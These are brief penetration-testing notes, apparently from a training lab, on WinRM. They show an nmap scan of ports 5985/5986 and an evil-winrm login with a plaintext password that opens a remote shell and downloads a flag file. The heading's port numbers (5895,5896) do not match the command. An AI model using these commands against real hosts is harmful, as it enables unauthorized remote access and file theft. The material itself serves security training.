WinRM (5895,5896)

Footprinting using nmap

nmap -sV -sC 10.129.201.248 -p5985,5986 --disable-arp-ping -n

Interacting using evil-winrm (Test-WsMan for windows powershell)

 evil-winrm -i 10.129.201.248 -u Cry0l1t3 -p P455w0rD!
 *Evil-WinRM* PS C:\Users\> download "C:/Users/flag.txt"

Last updated